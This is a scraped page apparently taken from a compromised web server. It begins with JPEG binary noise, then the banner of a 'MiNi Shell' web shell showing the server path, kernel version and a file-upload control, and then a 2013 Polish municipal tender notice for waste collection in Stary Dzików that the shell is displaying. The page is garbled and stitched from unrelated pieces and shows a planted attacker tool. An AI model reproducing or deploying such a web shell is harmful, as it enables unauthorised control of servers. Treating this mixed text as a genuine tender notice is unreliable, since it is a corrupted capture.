JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/226764-N-2013.html

<p class="kh_header"><b>Stary Dzików: ODBIÓR   I   ZAGOSPODAROWANIE   ODPADÓW   KOMUNALNYCH  Z  NIERUCHOMOŚCI  NA  TERENIE GMINY STARY DZIKÓW</b><br>
<b>Numer ogłoszenia: 226764 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Dzików , ul. T. Kościuszki 79, 37-632 Stary Dzików, woj. podkarpackie, tel. 0-16 631 80 50, faks 0-16 631 80 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starydzikow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR   I   ZAGOSPODAROWANIE   ODPADÓW   KOMUNALNYCH  Z  NIERUCHOMOŚCI  NA  TERENIE GMINY STARY DZIKÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Stary Dzików:
1)Wykonawca odbiera od właścicieli nieruchomości zamieszkałych i nie zamieszkałych każdą zebraną ilość odpadów komunalnych:
a)niesegregowanych  (zmieszanych) odpadów komunalnych  (200301) zgromadzonych w pojemnikach lub workach,
b)odpadów komunalnych gromadzonych w sposób selektywny, w pojemnikach  lub  w workach , obejmujących:
papier (150101, 200101),
szkło (150107, 200102),
tworzywa    sztuczne    (150102,    200139),    metal    (150104,    200140),    
odpady ulegające biodegradacji w tym odpady opakowaniowe ulegających biodegradacji (200108),
c)odpadów   komunalnych   gromadzonych   w   sposób   selektywny,   nie   wymagających specjalnych pojemników do ich zbierania, obejmujących:
meble i inne odpady wielkogabarytowe (200307);
odpady budowlane i rozbiórkowe (170102, 170103);
zużyte opony (160103);
zużyty sprzęt elektryczny i elektroniczny( 20 01 35, 200136*)
odpady zielone (200201).
2)Wykonawca zobowiązany będzie do doposażenia w dodatkowe urządzenia do zbierania odpadów tj. ( pojemnik na odpady budowlane)i do  prowadzenia Mobilnego  Punktu  Selektywnego Zbierania  Opadów  Komunalnych,    na    terenie    miejscowości    Stary Dzików  na    nieruchomości   stanowiącej    własność Zamawiającego - przy GOK Stary Dzików. Prowadzenie Mobilnego  Punktu  Selektywnego Zbierania  Opadów  Komunalnych obejmuje  doposażenie samochodu w pojemniki do zbierania odpadów problematycznych. Obsługa Mobilnego  Punktu  Selektywnego Zbierania  Opadów  Komunalnych w zakresie przyjmowania odpadów należeć będzie do Zamawiającego.
3)W Mobilnego  Punktu  Selektywnego Zbierania  Opadów  Komunalnych przyjmowane będą odpady komunalne zbierane selektywnie, w szczególności:
odpady    selektywne:    
zużyte opony (160103);
akumulatory i baterie (200133, 200134);
chemikalia,   w  tym   farby,   rozpuszczalniki,   oleje   odpadowe,   itp.  i   opakowania   po chemikaliach;
meble i inne odpady wielkogabarytowe (200307);
tekstylia (200111)
zużyty sprzęt elektryczny i elektroniczny  ( 200135, 300136*)
3)Pojemniki do gromadzenia odpadów (pojemniki, kontenery, worki), które zostaną ustawione w miejscach gromadzenia odpadów wskazanych przez Zamawiającego, zapewniają właściciele nieruchomości. W przypadku, gdy właściciel nieruchomości będzie zainteresowany udostępnieniem pojemnika do gromadzenia odpadów przez Wykonawcę, Wykonawca będzie zobowiązany do udostępnienia właścicielowi takiego pojemnika za odrębnym wynagrodzeniem. szczegółowe dane dotyczące liczby budynków, liczby miejsc do gromadzenia odpadów (altanki, miejsca ustawienia pojemników), na podstawie danych wskazanych w rozdziale 4.5 SIWZ.
4)Zamawiający będzie przekazywał Wykonawcy, w formie pisemnej (faksem lub maiłem),informacje o zmianach w liczbie i lokalizacji nieruchomości objętych obowiązkiem odbierania odpadów - w tym nieruchomości nowo powstałych - w ciągu 5 dni od daty złożenia   deklaracji.   Wykonawca   zaoferuje   i   dostarczy   pojemnik   właścicielom   nowo  powstałych nieruchomości, nie później jednak niż w ciągu 7 dni roboczych od dnia zgłoszenia przez Zamawiającego.
5)Zakres przedmiotu zamówienia obejmuje transport odebranych odpadów komunalnych
do   instalacji   odzysku   i   unieszkodliwiania   odpadów   lub  do   regionalnych   instalacji   do przetwarzania odpadów komunalnych (RIPOK) bądź instalacji zastępczych.
6)Wykonawca zobowiązany będzie podczas realizacji zamówienia zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami   oraz   ograniczenia   masy   odpadów   komunalnych   ulegających   biodegradacji przekazywanych do składowania zgodnie z:
a)art. 3 ust. 2 pkt 7, art. 3b i art. 3c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r., poz. 391 ze zm.),
b)rozporządzeniem Ministra Środowiska z 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U 2012 r., poz. 645),
c)rozporządzeniem Ministra Środowiska z 25 maja 2012 r. w sprawie poziomów ograniczenia  masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania  oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. 2012 r., poz. 676),
d)uchwałą Nr XXIV 409 12  Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie przyjęcia Planu gospodarki odpadami dla Województwa Podkarpackiego  
e)uchwałą Nr XXIV 410 12 Sejmiku Województwa Podkarpackiego z dnia 11 września 2012 r. w sprawie wykonania Planu gospodarki odpadami dla Województwa Podkarpackiego  
1. ZABUDOWA JEDNORODZINNA
Na terenie zabudowy jednorodzinnej obowiązywał będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych.
a) Zmieszane odpady komunalne (kod odpadu 20 03 01)
Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów zapewni właściciel nieruchomości i ustawi je w miejscach utwardzonych lub altanach śmietnikowych. Odbiór odpadów komunalnych będzie się odbywa poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi nieruchomościami w ustalonych przez Zamawiającego z Wykonawcą szczegółowych terminach. Liczb budynków jednorodzinnych oraz miejsc gromadzenia odpadów podano w rozdziale 4.5 SIWZ.
Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych - 1 raz na miesiąc
b) selektywnie zbierane odpady komunalne (kody 150101, 150102, 150107, 200140)
Selektywna zbiórka odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywa w systemie workowym. Wprowadza się następujące rodzaje worków:
kod 150101 - kolor worku niebieski (papier) - poj. 120 l.
kod 150102 - kolor worku zielony ( szkło) - poj. 120 l 
kod 150107 - kolor żółty (plastik) - 120 l
kod 200140 - kolor biały (metal) - 120 l
kod 200301 - kolor czarny (odpady zmieszane) - 120 l
kod 200108, 200108 - kolor fioletowy (odpady biodegradowalne) - 120 l
Worki zapewnia właściciel nieruchomości. Właściciel nieruchomości będzie mógł zakupić worki u Wykonawcy. Charakterystyka worków w rozdziale 4.5 SIWZ.
Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie - 1 raz na 1 miesiąc z podziałem na frakcje zgodnie z harmonogramem
c) odpady biodegradowalne (kod 20 02 01, 20 01 08)
Zbiórka odpadów biodegradowalnych będzie odbywać się w systemie workowym. Worki zapewnia właściciel nieruchomości. Właściciel nieruchomości będzie mógł zakupić worki u Wykonawcy. Charakterystyka worków w rozdziale 4.5 SIWZ.
Częstotliwość załadunku i wywozu przez Wykonawcę na zgłoszenie właściciela nieruchomości. 
d)odpady wielkogabarytowe (kod 20 03 07) i wyeksploatowany sprzęt elektryczny i elektroniczny (kody 20 01 23, 20 01 35 i 20 01 36) 
Odbiór odpadów wielkogabarytowych i wyeksploatowanego sprzętu elektrycznego i elektronicznego będzie się odbywa poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi nieruchomościami w ustalonych przez Zamawiającego z Wykonawcą szczegółowych terminach. 
Częstotliwość załadunku i wywozu przez Wykonawcę - dwa razy w roku. W okresie między wystawkami mieszkańcy będą mogli własnym transportem dowieźć odpady do mobilnego punktu selektywnego zbierania odpadów komunalnych w m. Stary Dzików - zgodnie z harmonogramem.
e)odpady budowlane 
Gospodarka odpadami budowlanymi nie jest przedmiotem niniejszego zamówienia i odbywać się będzie w oparciu o indywidualne umowy cywilno-prawne zawierane pomiędzy podmiotami wykonującymi prace remontowo-budowlane i właścicielami nieruchomości lub między właścicielami, a uprawnionymi do odbioru odpadów przedsiębiorcami.
f) odpady niebezpieczne typu leki, baterie (kody 18 01 09 oraz 16 06 03) 
Będą odbierane w dotychczasowo funkcjonujących punktach stacjonarnych (wykaz punktów zostanie przekazany Wykonawcy; ilość punktów odbioru: leki - ul. Kościuszki 74 (apteka) baterie - ul. Kościuszki 74 sklep AGROMAL).
2. ZABUDOWA WIELORODZINNA
Na terenie zabudowy wielorodzinnej obowiązywać będzie system mieszany workowo - pojemnikowy oraz pojemnikowo - kontenerowy zbiórki odpadów komunalnych.
a)zmieszane odpady komunalne (kod 20 03 01)
Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki zapewni właściciel nieruchomości i ustawi je w miejscach utwardzonych lub altanach śmietnikowych. Ilość budynków wielorodzinnych oraz miejsc gromadzenia odpadów podano w rozdziale 4.5 SIWZ.
Częstotliwość  załadunku i wywozu - 1 raz  w miesiącu.
b) selektywnie zbierane odpady komunalne (kody 20 01 01, 20 01 02, 20 01 10, 20 01 11, 20 01 39 i 20 01 40)
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do specjalistycznych pojemników lub worków..
NIERUCHOMOŚCI NIE ZAMIESZKAŁE WYTWARZAJĄCE ODPADY
Na terenie nieruchomości nie zamieszkałej wytwarzającej odpady obowiązywać będzie system mieszany workowo - pojemnikowy oraz pojemnikowo - kontenerowy zbiórki odpadów komunalnych.
a) zmieszane odpady komunalne (kod 20 03 01)
Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki zapewni właściciel nieruchomości i ustawi je w miejscach utwardzonych lub altanach śmietnikowych. Odbiór odpadów komunalnych będzie się odbywa poprzez odbieranie wystawionych ww. odpadów przez właścicieli przed swoimi nieruchomościami w ustalonych przez Zamawiającego z Wykonawcą szczegółowych terminach. Ilość budynków wielorodzinnych oraz miejsc gromadzenia odpadów podano w rozdziale 4.5 SIWZ.
Częstotliwość  załadunku i wywozu - 1 raz  w miesiącu.
b) selektywnie zbierane odpady komunalne (kody 20 01 01, 20 01 02, 20 01 10, 20 01 11, 20 01 39 i 20 01 40)
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do specjalistycznych pojemników i worków.
3.WYKAZ URZĄDZEŃ  DO GROMADZENIA ODPADÓW I SPRZĘTU TECHNICZNEGO:
a) Charakterystyka worków do selektywnej zbiórki odpadów:
materiał - folia polietylenowa LDPE,
pojemność - 120 dm3,
kolor - biały, zielony, niebieski, żółty i fioletowy, 
grubość - co najmniej 60 mikronów,
Oprócz kolorów worki powinny być oznaczone opisowo np. papier, szkło, tworzywa sztuczne i opakowania wielomateriałowe itd., dodatkowo Wykonawca może umieścić również informacje dot. szczegółowego asortymentu, który należy gromadzić w workach np. worki z napisem PAPIER - wrzucamy: książki, gazety, zeszyty torby papierowe, karton, tekturę itd.
4.SZCZEGÓŁOWE DANE CHARAKTERYZUJĄCE ZAMÓWIENIE
Powierzchnia Gminy Stary Dzików  wynosi 15 577 ha. Teren zabudowany około 300 ha. 
Liczba mieszkańców Gminy  wynosi 4 606 z czego: 4 570 w zabudowie jednorodzinnej :
Liczba gospodarstw domowych wynosi 980 
W trakcie trwania Zamówienia przewiduje się wzrost liczby gospodarstw domowych oraz liczby mieszkańców o 1 %.
liczba budynków jednorodzinnych (gospodarstw domowych 980
liczba miejsc do gromadzenia odpadów zmieszanych (altanki, miejsca ustawienia pojemników) - 980
liczba budynków wielolokalowych wynosi: 1
4) Liczba nieruchomości nie zamieszkałych wytwarzających odpady komunalne wynosi 70
liczba miejsc do gromadzenia odpadów zmieszanych w nieruchomościach nie zamieszkałych wynosi 70
liczba pojemników z podziałem na pojemności:
120l - 40szt.
1100l - 20szt.
30l - 40szt. 
Podane ilości są jedynie szacunkowymi wartościami obliczonymi na podstawie danych z ewidencji ludności oraz ewidencji nieruchomości.
Rodzaje pojemników do gromadzenia odpadów zmieszanych:
a)120 l. 
b)1100 l. 
c)60 l.
d)70 l.
e)30 l..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium.
Kwota wadium wynosi 6 000 zł (słownie: sześć tysięcy złotych ).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-kopii aktualnego wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Stary Dzików,
-wpisu do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia którego opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu Zamawiający żąda:
- wykonania w okresie ostatnich 3 lat co najmniej 1 usługi odbioru odpadów komunalnych wykonanej na rzecz właścicieli nieruchomości w sposób ciągły przez okres minimum 12 miesięcy o masie łącznej minimum - 700 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego potencjału technicznego, którego opis sposobu spełnienia został dokonany w ogłoszeniu o zamówieniu Zamawiający żąda: 
- dysponowania co najmniej 1 samochodem specjalistycznym do odbierania odpadów bez funkcji kompaktujacej
- dysponowania co najmniej 2 (dwoma) pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych
- dysponowania co najmniej 2 (dwoma) pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych
Utrzymanie i  odpowiedniego stanu sanitarnego pojazdów i wymagania techniczne musi być zgodne z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r w sprawie w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U . 2013 poz.122)
- posiadania bazy magazynowo-transportowej usytuowanej w odległości nie większe niż 60 km od granicy gminy Stary Dzików na terenie do którego posiada tytuł prawny
Wyposażenie  bazy musi być zgodne z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r w sprawie w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U . 2013 poz.122)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starydzikow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starym Dzikowie ul. Kościuszki 79; 37-632 Stary Dzików pok. nr 5.</p>
